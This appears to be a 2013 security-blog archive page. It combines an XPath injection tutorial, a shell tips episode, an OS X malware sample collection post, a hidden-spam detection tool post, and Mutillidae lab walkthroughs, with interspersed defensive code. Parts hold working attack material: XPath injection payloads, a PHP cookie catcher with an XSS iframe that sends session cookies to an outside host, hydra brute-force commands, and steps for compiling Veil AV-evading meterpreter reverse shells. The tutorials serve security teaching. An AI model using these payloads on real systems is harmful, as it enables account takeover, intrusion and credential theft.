Monthly Archives: November 2013

XPATH Injection Tutorial

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We will learn using a simple example. Download the code from here and put it in your local server directory. (The code was created by Amol Naik.)

Sample XML document which we are going to use:-

<Employees>
<!-- Employees Database -->
  <Employee ID="1">
    <FirstName>Johnny</FirstName>
    <LastName>Bravo</LastName>
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName>
    <LastName>Brown</LastName>
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="3">
    <FirstName>William</FirstName>
    <LastName>Gates</LastName>
    <UserName>wgates</UserName>
    <Password>MSRocks!</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="4">
    <FirstName>Chris</FirstName>
    <LastName>Dawes</LastName>
    <UserName>cdawes</UserName>
    <Password>letmein</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Bypass Authentication:-


Browse to the login.php page; here we can see a simple login form.

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Looks quite familiar, doesn't it? Using these parameters, the query becomes:

string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text())

As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided.
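The effect of that payload on a concatenated query, next to a lookup that keeps user input out of the query text entirely. This is an added example, not part of the original tutorial or of Amol Naik's code; it assumes login.php builds its query from the sample document's UserName, Password and Type elements, and the function names are hypothetical.

```python
import hmac
import re
import xml.etree.ElementTree as ET

# Two records from the sample document on this page, trimmed to the fields used.
EMPLOYEES_XML = """<Employees>
  <Employee ID="1">
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
  </Employee>
</Employees>"""
ROOT = ET.fromstring(EMPLOYEES_XML)

PAYLOAD = "' or '1' = '1"  # the value the page enters in both fields


def concatenated_query(username, password):
    """Query text as a login page builds it by string concatenation.
    Element names follow the sample XML (an assumption about login.php)."""
    return ("string(//Employee[UserName/text()='%s' and Password/text()='%s']"
            "/Type/text())" % (username, password))


def boolean_operators(query):
    """Return the and/or operators that sit outside quoted string literals,
    i.e. the boolean structure the XPath engine will actually evaluate."""
    outside = re.sub(r"'[^']*'|\"[^\"]*\"", " ", query)
    return re.findall(r"\b(and|or)\b", outside)


def query_is_tampered(query):
    """The intended predicate has exactly one 'and'; anything else means
    user input was parsed as XPath syntax instead of data."""
    return boolean_operators(query) != ["and"]


def safe_login(root, username, password):
    """Authenticate without placing user input in any query string.
    Returns the account type, or None when the credentials do not match."""
    for employee in root.iter("Employee"):
        stored_user = employee.findtext("UserName", default="")
        stored_pass = employee.findtext("Password", default="")
        user_ok = hmac.compare_digest(stored_user.encode(), username.encode())
        pass_ok = hmac.compare_digest(stored_pass.encode(), password.encode())
        if user_ok and pass_ok:
            return employee.findtext("Type")
    return None


if __name__ == "__main__":
    for user, pw in (("jbravo", "test123"), (PAYLOAD, PAYLOAD)):
        query = concatenated_query(user, pw)
        print(boolean_operators(query), query_is_tampered(query),
              safe_login(ROOT, user, pw))
```

Where the XPath library offers variable binding or precompiled queries, that achieves the same separation of query and data without leaving XPath.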


Blind Xpath Injection:-


If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.

Browse to the search.php page and enter any number. When you provide a number, it displays the FirstName related to that ID.

Enter ' or '1' = '1 in the search box, and you will get all FirstName values regardless of any ID (number).

In blind XPath injection, we have to provide a specially crafted query to the application; if the query is true we get a result, otherwise we do not get any result. So far, we don't know about any parent or child node of the XML document.

Guessing of parent node:-


Supply the following query to the application and observe the result.

' or substring(name(parent::*[position()=1]),1,1)='a

Nothing happens; we don't get the FirstName of the users. It means the first letter of the parent node is not "a". Now supply the following query:

' or substring(name(parent::*[position()=1]),1,1)='E

You get a result, which means the first letter of the parent node is "E".

To guess the second letter of the parent node, supply the following query:

' or substring(name(parent::*[position()=1]),2,1)='m

Following the same procedure, we can extract the full name of the parent node, which was found to be 'Employee'.

We can also get a child node. Browse to the xpath.php page and enter the following query.

//Employee[position()=3]/child::node()[position()=4]/text()

You get output from the parent node Employee ID 3 and the child node whose position is 2.

To get the whole document, use the following query.

//Employee

This is just the concept of how to retrieve data from an XML document using XPath injection. XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:

  • count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.
  • string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.

I used the recon-ng xpath bruteforcer for the XPath injection attack, and we will get the back-end XML file.
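Because blind extraction needs one request per guessed character, it leaves a recognisable trail in web server logs. The following detection sketch is an added example, not part of the original post: the log lines are constructed, and the `id` parameter name for search.php and the threshold of three probes are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, quote, urlsplit

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# XPath functions and axes that have no business in a numeric search field.
XPATH_TOKENS = re.compile(
    r"\b(?:substring|string-length|count|position|name)\s*\("
    r"|\b(?:parent|child|ancestor|descendant)::", re.I)
# quote, "or", then the same token on both sides of "=" (e.g. ' or '1' = '1).
TAUTOLOGY = re.compile(r"""['"]\s*or\s*['"]?(\w+)['"]?\s*=\s*['"]?\1""", re.I)


def classify(value):
    """Return why a decoded parameter value looks like an XPath probe, or None."""
    if TAUTOLOGY.search(value):
        return "tautology"
    if re.search(r"['\"]", value) and XPATH_TOKENS.search(value):
        return "xpath-function"
    return None


def flagged_requests(log_lines):
    """Yield (client_ip, reason, decoded_value) for each suspicious parameter."""
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue
        ip, target = match.groups()
        query = urlsplit(target).query
        for _name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify(value)
            if reason:
                yield ip, reason, value


def suspected_blind_extraction(log_lines, min_probes=3):
    """Clients that sent at least min_probes flagged requests."""
    counts = Counter(ip for ip, _reason, _value in flagged_requests(log_lines))
    return sorted(ip for ip, n in counts.items() if n >= min_probes)


def _line(ip, value):
    # Constructed access-log line; the "id" parameter name is an assumption.
    return ('%s - - [12/Nov/2013:10:00:00 +0000] '
            '"GET /search.php?id=%s HTTP/1.1" 200 512' % (ip, quote(value, safe="")))


# Constructed sample: normal lookups, one tautology, and the page's probe sequence.
SAMPLE_LOG = [
    _line("192.0.2.10", "2"),
    _line("192.0.2.10", "3"),
    _line("203.0.113.5", "' or '1' = '1"),
    _line("198.51.100.7", "' or substring(name(parent::*[position()=1]),1,1)='a"),
    _line("198.51.100.7", "' or substring(name(parent::*[position()=1]),1,1)='E"),
    _line("198.51.100.7", "' or substring(name(parent::*[position()=1]),2,1)='m"),
]

if __name__ == "__main__":
    for hit in flagged_requests(SAMPLE_LOG):
        print(hit)
    print("blind extraction suspected from:", suspected_blind_extraction(SAMPLE_LOG))
```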


Useful Links & Blind XPATH injection Tools:-

https://www.owasp.org/index.php/XPATH_Injection

https://www.owasp.org/index.php/Blind_XPath_Injection

XPATH BLIND EXPLORER:-  http://code.google.com/p/xpath-blind-explorer/downloads/list

XCAT:-  https://github.com/orf/xcat

Episode #172: Who said bigger is better?

Tim sweats the small stuff

Ted S. writes in:

"I have a number of batch scripts which turn a given input file into a configurable amount of versions, all of which will contain identical data content, but none of which, ideally, contain the same byte content. My problem is, how do I, using *only* XP+ cmd (no other scripting - PowerShell, jsh, wsh, &c), replace the original (optionally backed up) with the smallest of the myriad versions produced by the previous batch runs?"

This is pretty straightforward, but it depends on what we want to do with the files. I assumed that the larger files should be deleted since they are redundant. This will leave us with only the smallest file in the directory. Let's start off by listing all the files in the current directory and sort them by size.

C:\> dir /A-D /OS /b
file3.txt
file2.txt
file1.txt
file4.txt

Sorting the files, and only files, in the current directory by size is pretty easy. The "/A" option filters on the object's properties and directories are filtered out with "-D". Next, the "/O" option is used to sort and the "S" tells the command to sort putting the smallest files first. Finally, the "/b" is used to show the bare format.

At this point we have the files in the proper order and in a nice light format. We can now use a For loop to delete everything while skipping the first file.

C:\> for /F "tokens=* skip=1" %i in ('dir /A-D /OS /b') do @del %i

Here is the same functionality in PowerShell:

PS C:\> Get-ChildItem | Where-Object { -not $_.PSIsContainer } | Sort-Object -Property Length | Select-Object -Skip 1 | Remove-Item

This is mostly readable. The only exception is the "PSIsContainer". Directories are container objects but files are not, so we filter out the containers (directories). Here is the same command shortened using aliases and positional parameters:

PS C:\> ls | ? { !$_.PSIsContainer } | sort Length | select -skip 1 | rm

There you go Ted, and in PowerShell even though you didn't want it. Here comes Hal bringing something even smaller you don't want.

Hal's is smaller than Tim's... but less sweaty

Tim, how many times do I have to tell you, smaller is better when it comes to command lines:

ls -Sr | tail -n +2 | xargs rm

It's actually not that different from Tim's PowerShell solution, except that my "ls" command has "-S" to sort by size as a built-in. We use the "-r" flag to reverse the sort, putting the smallest file first and skipping it with "tail -n +2".

If you're worried about spaces in the file names, we could tart this one up a bit more:

ls -Sr | tail -n +2 | tr \\n \\000 | xargs -0 rm

After I use "tail" to get rid of the first, smallest file, I use "tr" to convert the newlines to nulls. That allows me to use the "-0" flag to "xargs" to split the input on nulls, and preserves the spaces in the input file names.

What may be more interesting about this Episode is the command line I used to create and re-create my files for testing. First I made a text file with lines like this:

1 3
2 4
3 1
4 2

And then I whipped up a little loop action around the "dd" command:

$ while read file size; do 
dd if=/dev/zero bs=4K count=$size of=file$file;
done <../input.txt

3+0 records in
3+0 records out
12288 bytes (12 kB) copied, 6.1259e-05 s, 201 MB/s
4+0 records in
4+0 records out
16384 bytes (16 kB) copied, 0.000144856 s, 113 MB/s
1+0 records in
1+0 records out
4096 bytes (4.1 kB) copied, 3.4961e-05 s, 117 MB/s
2+0 records in
2+0 records out
8192 bytes (8.2 kB) copied, 4.3726e-05 s, 187 MB/s

Then I just had to re-run the loop whenever I wanted to re-create my test files after deleting them.

OSX malware and exploit collection (~100 files) + links and resources for OSX malware analysis



'Tis the season.

Here is a nice collection of ~100 Mac OS malware and Word document exploits carrying MacOS payload (all are CVE-2009-0563) along with links for OSX malware analysis.

Please send your favorite tools for OSX if they are not listed.




CVE-2009-0563

Stack-based buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP1 and SP2; Microsoft Office for Mac 2004 and 2008; Open XML File Format Converter for Mac; Microsoft Office Word Viewer 2003 SP3; Microsoft Office Word Viewer; and Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary code via a Word document with a crafted tag containing an invalid length field, aka "Word Buffer Overflow Vulnerability."



Links



Some OSX malware analysis tools and links 


Tools


Malware in the provided package - links to research and news articles






Download



Download. Email me if you need the password
OSX_CrisisB_a32e073132ae0439daca9c82b8119009 
Additional older downloads

  1. OSX_Docklight payload  http://contagioexchange.blogspot.com/2012/05/019-speechdoc-macosxms09-027a-word.html 
  2. misc OSX malware on contagio http://contagiodump.blogspot.com/search/label/-%20OSX
  3. 30 samples of ancient Mac OS malware http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html



List of files provided in this post





EXPLOITS
OSX_CVE-2009-0563 targeting Tibetan and Uyghur activists (filenames shortened here)



Reporting Suspicious Styles

Back in 2008, the very first task that I created Unmask Parasites for was scanning web pages for hidden links.

I read an article about thousands of WordPress blogs being stuffed with dozens of invisible spammy links. I had a self-hosted WordPress blog too and that article made me think if there was some easy way to figure out whether my blog was hacked, something less laborious than manually examining the HTML code link by link. So I decided to create a tool that would show all domains that my web pages linked to highlighting those of them that had “invisible” styles. This approach has proved to be very efficient in identifying black hat SEO hacks. In most cases, a glance is enough to spot such problems.

It works well even when the tool doesn’t highlight links as “hidden” (either because the “hiding rule” was not detected or because it scanned the “cloaked” page created specifically for search engines). You can still see the links that clearly don’t belong to your site, which tells you that something’s wrong.

However, looking for suspicious links is not a bullet-proof method for detecting spam injection issues. For example, in my post on the Sucuri blog yesterday, I wrote about fake WordPress plugins that used to inject spammy links and JavaScript code into web pages. However, at the moment, they inject some hidden spammy auto-generated text that doesn’t have any links.

You can use this Google query to reveal affected sites [cigarettes AND (“3200 unhealthy” OR “3300 hazardous”)]

I don’t know why they do it, but webmasters should definitely be warned about such injections because it’s a sign of a problem that should be fixed as soon as possible. This is actually more serious than just a factor that can potentially affect site’s search ranking. Those fake plugins fetch the spammy content from remote servers and inject it into blog pages on the fly. This means that hackers can change it any time and the same moment the new spammy block will be injected into all compromised sites. Or it can be a malicious block, which makes things more serious as it will affect all visitors to those sites too.

Unfortunately, such injections were not reported by Unmask Parasites since there were no links in the spammy block. After thinking about the problem, I decided that Unmask Parasites should also report pure HTML tricks such as that clip:rect style trick that hackers use to hide their injections.

So, starting this week, you may see the “Suspicious Styles” section in Unmask Parasites reports.

In this section, you will see excerpts of the style definitions that Unmask Parasites considers suspicious. If you see it in your site reports, then you should check the HTML code of your pages and figure out whether that style is a normal part of your pages or it was added there to hide something illicit.

Note, if you can’t find such code in your web pages, it doesn’t mean it is not there. The code injection can be conditional, and server files may fetch it from a remote location (as in this case with fake WordPress plugins), or it can be encrypted. Just remember that Unmask Parasites works in real time (some results may be cached for up to an hour) and if it reports something, then you can be sure it was on a web page at the moment of scanning.
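A scanner in the spirit of that report section, as an added example rather than Unmask Parasites' own code: it extracts excerpts of style definitions that hide content. The clip:rect rule is the trick named above; the off-screen offset rule goes beyond the post, the thresholds are assumptions, and the sample page is constructed.

```python
import re
from html.parser import HTMLParser

CLIP_RECT = re.compile(r"clip\s*:\s*rect\(([^)]*)\)", re.I)
# Assumed second rule: pushing a block at least 1000 units off screen.
OFFSCREEN = re.compile(
    r"(?:margin-left|text-indent|left|top)\s*:\s*-\d{4,}(?:px|em)?", re.I)


def suspicious_rules(css):
    """Return (rule_name, excerpt) pairs for hiding tricks found in a CSS string."""
    hits = []
    for match in CLIP_RECT.finditer(css):
        numbers = re.findall(r"-?\d+(?:\.\d+)?", match.group(1))
        if len(numbers) == 4:
            top, right, bottom, left = map(float, numbers)
            # A clipping rectangle at most 1 unit wide and high shows nothing.
            if right - left <= 1 and bottom - top <= 1:
                hits.append(("clip-rect", match.group(0)))
    for match in OFFSCREEN.finditer(css):
        hits.append(("offscreen", match.group(0)))
    return hits


class StyleScanner(HTMLParser):
    """Collects findings from inline style attributes and <style> blocks."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
        style = dict(attrs).get("style")
        if style:
            self._record(style, "inline <%s>" % tag)

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self._record(data, "<style> block")

    def _record(self, css, where):
        for rule, excerpt in suspicious_rules(css):
            self.findings.append((where, rule, excerpt))


def scan_html(html):
    """Return a list of (location, rule_name, excerpt) for one page."""
    scanner = StyleScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: one legitimate clip, two hiding tricks.
SAMPLE_PAGE = """<html><head><style>
.nav { position: relative; left: 10px; }
.x7 { position:absolute; clip:rect(1px,1px,1px,1px); }
</style></head><body>
<p style="color:#333">Welcome to my blog</p>
<div style="position:absolute; left:-9999px">constructed spam text</div>
<img style="clip: rect(0px, 200px, 100px, 0px); position:absolute" src="logo.png">
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding)
```

Accessibility helpers also use tiny clip rectangles, so a finding is a prompt to inspect the markup, as the post says, not a verdict.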

To Unmask Parasites users

If you like Unmask Parasites and want to help improve it, you can inform me about interesting tricks that hackers use to hide injected content, or send me examples of infected web pages where Unmask Parasites doesn’t report any problems.

Thanks!


Is MAM Identity and Access Management’s next big thing?

Mobile Application Management is making waves. Recent news from Oracle, IBM, and Salesforce highlights the market interest. It's a natural extension of what you've been hearing at Identity trade shows over the past few years (and this year's Gartner IAM Summit was no exception). The third platform of computing is not a future state. It's here. And Identity and Access solutions are adapting to accommodate the new use case scenarios. ...onward and upward.

[Update - interesting discussion of the IAM technology stack for mobile by SIMIEO]

Broken Authentication & Session Management in Mutillidae

Broken Authentication and Session Management is number 2 in the OWASP Top 10 vulnerability list for 2013. In Mutillidae, it contains three subsections.

  • Authentication Bypass
  • Privilege Escalation
  • Username Enumeration

We have already covered username enumeration in the last article, and we got a list of valid usernames which exist in the database. Today we are going to use authentication bypass methods.

  1. Using cookie
  2. Using brute-force
  3. Using SQL injection

(1)Authentication Bypass using cookie:- 

As we know, Mutillidae is vulnerable to XSS, so we can capture a cookie with the help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

The above link is vulnerable to a persistent XSS attack. We can submit HTML to the add blog section, so we are going to use a cookie catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to the server. For the demo I used my local Apache server; after the script executes, it redirects to 192.168.56.1. You can change the code according to your needs. It grabs the IP, cookie, referer, time and date.

Now, as an anonymous user, we will add a blog entry. I used another OS on my VirtualBox for the attack.

(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php

(2)Submit the following HTML to the blog

<html>
<body>
<b> nirav k desai</b>
<u>help me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.56.1/cookie_catcher.php?c="+document.cookie) </iframe >
</body>
</html>

Replace the link http://192.168.56.1/cookie_catcher.php with the location of your uploaded cookie_catcher.php.

(3)Now when "admin" or any logged-in user views your added blog entry, you will get his cookie, IP, date and time.

(4)To view the cookie, open cookies.html.

(5)Now you can use any cookie manager add-on to edit the cookie; replace it with the cookie which we got.

(6)After a reload we get admin access to the web application.
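The whole chain above depends on the session cookie being readable through document.cookie. The following check is an added example, not part of the original post: it audits Set-Cookie header values and shows what a script on the page could read. The header values are constructed; PHPSESSID is PHP's default session cookie name and `theme` is a hypothetical preference cookie.

```python
from http.cookies import SimpleCookie

# HttpOnly is the attribute that hides a cookie from document.cookie;
# Secure and SameSite are checked as well because they limit where it travels.
CHECKED = ("httponly", "secure", "samesite")


def _morsels(set_cookie_values):
    """Parse each Set-Cookie header value and yield (name, morsel) pairs."""
    for raw in set_cookie_values:
        jar = SimpleCookie()
        jar.load(raw)
        yield from jar.items()


def missing_attributes(set_cookie_values):
    """Map each cookie name to the protective attributes it lacks."""
    return {name: [attr for attr in CHECKED if not morsel[attr]]
            for name, morsel in _morsels(set_cookie_values)}


def document_cookie_view(set_cookie_values):
    """The string a script would get from document.cookie: every cookie
    without HttpOnly, which is exactly what an injected script can send away."""
    return "; ".join("%s=%s" % (name, morsel.value)
                     for name, morsel in _morsels(set_cookie_values)
                     if not morsel["httponly"])


# Constructed response headers: the weak setting beside the corrected one.
WEAK_RESPONSE = [
    "PHPSESSID=constructed0123456789; path=/",
    "theme=dark; path=/",
]
HARDENED_RESPONSE = [
    "PHPSESSID=constructed0123456789; path=/; HttpOnly; Secure; SameSite=Lax",
    "theme=dark; path=/",
]

if __name__ == "__main__":
    for label, headers in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, missing_attributes(headers))
        print(label, "document.cookie ->", document_cookie_view(headers))
```

HttpOnly only removes the session identifier from the script's reach; the stored XSS itself is closed by HTML-encoding blog entries when they are rendered.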

(2)Authentication Bypass Using bruteforce:- 

You can use hydra or Burp Intruder to brute-force the login form of the application.

hydra -l admin -P /root/pass.txt  127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"


(3)Authentication Bypass Using sql injection:- 

We can inject special database characters or SQL timing attacks into page parameters. We are going to use the login page and inject SQL characters into the login form.

You can use a SQL injection cheat sheet, and we will brute-force using SQL statements. Save it to a file.

hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"


And we got for valid SQL statements ; with help of it we can bypass admin panel.

How to solve compile error in veil?

As you know, Veil is an AV evasion framework for Metasploit payloads. On the 15th of every month, for the next year, at least one new payload module will be released. Yesterday they released two new payloads.

  1. pure windows/meterpreter/reverse_tcp stager, no shellcode
  2. pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode

Compiler Error in c payloads:-


 Available c payloads:

    VirtualAlloc                         Poor
    VoidPointer                         Poor
    meter_rev_tcp                     Excellent
    meter_rev_tcp_service        Excellent

I used c/meter_rev_tcp. After setting LHOST & LPORT, when I tried to generate it, I got an error.

sh: i686-w64-mingw32-gcc: command not found

Okay, now we have successfully generated the payload file, but we get a compiler error while compiling it into a cross-platform exe.

The error clearly suggests that i686-w64-mingw32-gcc is not installed. The mingw-w64 project is a complete run-time environment for gcc to support binaries native to Windows 64-bit and 32-bit operating systems. In short, to compile the payload for 64-bit Windows, we have to install mingw-w64.

In the case of a 32-bit Windows OS, we can compile it, because when you set up the Veil environment, mingw32 is installed using wine.

Compile payload for 32 bit:-


root@bt:~# cd .wine/drive_c/MinGW/bin/

root@bt:~/.wine/drive_c/MinGW/bin# wine mingw32-gcc.exe /root/veil-output/source/output.c -lwsock32  -o output.exe

So our payload is compiled into an exe for 32-bit Windows.

Compile payload for 64 bit:-


For this purpose you have to install mingw-w64.

Download it from here & build it. If you don't want to install it, then you can use a pre-compiled version.

root@bt:/media/tools/mingw-w64-bin_i686-linux_20111031_sezero/cross_win64/bin# ./x86_64-w64-mingw32-gcc /root/veil-output/source/output.c -lwsock32 -o output.exe

I haven't tested the compiled exe on 64-bit, so if anyone uses it, please let me know whether the exe is working or not.

If you want to build MinGW-w64 for Win32 and Win64 using automated bash script, click here.

Compiler error in C#:-

Available c# payloads:

    VirtualAlloc                   Poor
    b64SubVirtualAlloc       Normal


root@bt:~/Downloads/Veil-master# ./Veil.py -l c# -p b64SubVirtualAlloc --msfpayload windows/meterpreter/reverse_tcp -o payload --msfoptions LHOST=192.168.56.101 LPORT=443

Our source file was generated, but we got the following error:

error CS2007: Unrecognized command-line option: `-platform:x86'

Compiling the generated source directly with gmcs, without that option, works:

gmcs /root/veil-output/source/payload.cs

Now our exe is generated; it's in the same source folder.

Username Enumeration in Mutillidae using Burp Intruder.

Mutillidae is a free, open source, vulnerable web application providing a target for web-security testers. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMPP.

Username Enumeration :- We have an application that reveals to us when a username exists on the system, which can be used in further steps such as brute-forcing an account.

On the Mutillidae login page, when you provide a valid username and an invalid password, the web application replies that the password is incorrect.

When we provide an invalid username, the application tells us that the account does not exist.

So by monitoring the web application's messages, one can know whether a username is valid or not.

First we will examine the source code of the page: when we provide a valid username the reply is "var lAuthenticationAttemptResultFlag = 1", and when we provide an invalid username the reply is "var lAuthenticationAttemptResultFlag = 0".

var lAuthenticationAttemptResultFlag = 1    It means the username exists.

var lAuthenticationAttemptResultFlag = 0    It means the username does not exist.



Alternatively, we can do this by saving the source code of both pages (valid username & invalid username) in text files and then using the diff command.

root@bt:~# diff login password
762c762
< var lAuthenticationAttemptResultFlag = 0;
---
> var lAuthenticationAttemptResultFlag = 1;
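The same diff can be turned into a regression check for the fix: a login handler passes when the responses for an unknown account and for a known account with a wrong password are identical. This is an added example, not Mutillidae's code; the handlers, the account, the salt and the markup around the flag line are constructed for illustration.

```python
import difflib
import hashlib
import hmac

SALT = b"constructed-salt"  # a real system uses a random salt per account


def _hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)


USERS = {"admin": _hash("constructed-password")}  # constructed account
DUMMY_HASH = _hash("placeholder for unknown accounts")


def _page(flag, message):
    return ("<html>\n<script>\nvar lAuthenticationAttemptResultFlag = %d;\n"
            "</script>\n<p>%s</p>\n</html>\n" % (flag, message))


def leaky_login(username, password):
    """Behaves as the post describes: flag and message differ per case.
    It also skips the hash for unknown users, which leaks through timing."""
    if username not in USERS:
        return _page(0, "Account does not exist")
    if not hmac.compare_digest(USERS[username], _hash(password)):
        return _page(1, "Password incorrect")
    return "<html>\n<p>Logged in</p>\n</html>\n"


def uniform_login(username, password):
    """One failure response for both cases, with the same hashing work."""
    stored = USERS.get(username, DUMMY_HASH)
    password_ok = hmac.compare_digest(stored, _hash(password))
    if not (password_ok and username in USERS):
        return _page(0, "Invalid username or password")
    return "<html>\n<p>Logged in</p>\n</html>\n"


def enumeration_oracle(login, known_user, unknown_user,
                       wrong_password="constructed-wrong"):
    """Diff the two failure responses; any line returned is an oracle."""
    unknown = login(unknown_user, wrong_password).splitlines()
    known = login(known_user, wrong_password).splitlines()
    diff = difflib.unified_diff(unknown, known, lineterm="", n=0)
    return [line for line in diff
            if line.startswith(("+", "-"))
            and not line.startswith(("+++", "---"))]


if __name__ == "__main__":
    for handler in (leaky_login, uniform_login):
        print(handler.__name__, enumeration_oracle(handler, "admin", "nosuchuser"))
```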

Now open Burp Suite, set up the listener, try to sign in from the browser, and capture the request.

Now right-click on the request and click on send to intruder.

For positions, we choose only the username.

On payload tab -> payload option -> load sample username list.

In option tab -> Grep match -> Add
var lAuthenticationAttemptResultFlag = 1; var lAuthenticationAttemptResultFlag = 0;

Click on intruder -> start attack

Now Burp makes requests to the login page, examines them, and classifies the responses according to the options which we provided.

Click on save, result table; for the delimiter click on custom and put ";", then select the columns which we need. In this case I selected payload, var lAuthenticationAttemptResultFlag = 1, and var lAuthenticationAttemptResultFlag = 0, and then saved it.

The saved file looks like the following format.

In the file, the first field is the username; then true means the username exists, and false means the username is invalid. So now we only need the entries whose second column is true.

So I saved these values in another temp file, from which you can extract the usernames using the delimiter. I used a simple Python script for this purpose.

Finally we got the list of usernames which exist on the system.